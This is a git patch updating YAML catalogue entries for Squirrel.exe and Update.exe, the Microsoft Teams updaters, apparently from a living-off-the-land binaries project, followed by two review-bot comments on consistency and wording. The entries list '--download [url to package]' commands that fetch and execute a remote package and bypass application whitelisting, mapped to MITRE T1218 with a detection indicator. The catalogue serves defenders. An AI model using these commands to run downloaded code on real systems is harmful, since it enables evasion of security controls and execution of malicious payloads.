From 60f55ee5977d4192f01ec9823b2d4ce522e7b45d Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 27 Jun 2019 17:12:23 +0200 Subject: [PATCH] Adjusted Squirrel and Update --- yml/OtherMSBinaries/squirrel.yml | 46 +++++++++++++++----------------- yml/OtherMSBinaries/update.yml | 8 +++--- 2 files changed, 26 insertions(+), 28 deletions(-) diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/squirrel.yml index a653f3a..65db7b1 100644 --- a/yml/OtherMSBinaries/squirrel.yml +++ b/yml/OtherMSBinaries/squirrel.yml 
@@ -1,47 +1,45 @@ -Name: squirrel.exe -Description: Binary to update the existing installed Nuget/squirrel package -Author: User -Created: Installed date +Name: Squirrel.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. +Author: 'Reegun J (OCBC Bank) - @reegun21' +Created: '2019-06-26' Commands: - Command: squirrel.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Execute - Privileges: User Privilege + Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows OS + OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: squirrel.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: AWL Bypass - Privileges: User Privilege + Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 10 - Command: squirrel.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. 
Usecase: Download and execute binary Category: Download - Privileges: User Privilege + Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows 10 + OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: -- Path: NA -- Path: %localappdata%\Microsoft\Teams\current\Squirrel.exe + - Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe' Code_Sample: -- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel + - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel Detection: -- IOC: NA -- IOC: NA + - IOC: Update.exe spawned an unknown process Resources: - - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - - Link: https://twitter.com/reegun21/status/1144182772623269889 - - Link: NA - Acknowledgement: + - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls + - Link: https://twitter.com/reegun21/status/1144182772623269889 + - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ +Acknowledgement: - Person: Reegun J (OCBC Bank) - Handle: @reegun21 - - Person: NA - Handle: NA + Handle: '@reegun21' + - Person: Adam + Handle: '@Hexacorn' --- diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/update.yml index e9a45de..92c210e 100644 --- a/yml/OtherMSBinaries/update.yml +++ b/yml/OtherMSBinaries/update.yml @@ -1,11 +1,11 @@ --- Name: Update.exe -Description: Binary to update the existing installed Nuget/squirrel package +Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Oddvar Moe' Created: '2019-06-26' Commands: - Command: Update.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User 
@@ -13,7 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User @@ -21,7 +21,7 @@ Commands: MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Download Privileges: User
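Review bot: In the squirrel.yml hunk the second command entry (Category: AWL Bypass) still carries `OperatingSystem: Windows 10` while the Execute and Download entries for the identical `squirrel.exe --download [url to package]` command were changed to `OperatingSystem: Windows 7 and up with Microsoft Teams installed`; all three describe the same binary at the same Full_Path, so the AWL Bypass entry should be updated to match. Two smaller consistency points in the same hunk: the sole Detection entry reads `- IOC: Update.exe spawned an unknown process`, which names Update.exe inside the Squirrel.exe entry, so either the Description should state the relationship between the two binaries or an IOC for Squirrel.exe itself should be added; and the Name and Full_Path now use `Squirrel.exe` while the three Command lines still use lowercase `squirrel.exe`, which is worth aligning. Finally, the hunk starts at line 1 with `Name: Squirrel.exe`, whereas update.yml opens with a `---` document marker and squirrel.yml only has one as trailing context at the end of the file; adding the leading `---` (and dropping the trailing one if it is not intended) keeps the two files parseable the same way.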
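Review bot: The new Description text in the first update.yml hunk, `The above binary will go to url and look for RELEASES file and download the nuget package.`, is still ungrammatical; suggest `Update.exe will fetch the RELEASES file from the given URL and download the NuGet package it references.` The same string is introduced in the `@@ -13,7` and `@@ -21,7` hunks of update.yml and in all three Command entries of squirrel.yml, so the wording should be fixed in every occurrence rather than only here. On the same hunk, `Part of Microsoft Teams installation.` reads better as `Part of the Microsoft Teams installation.`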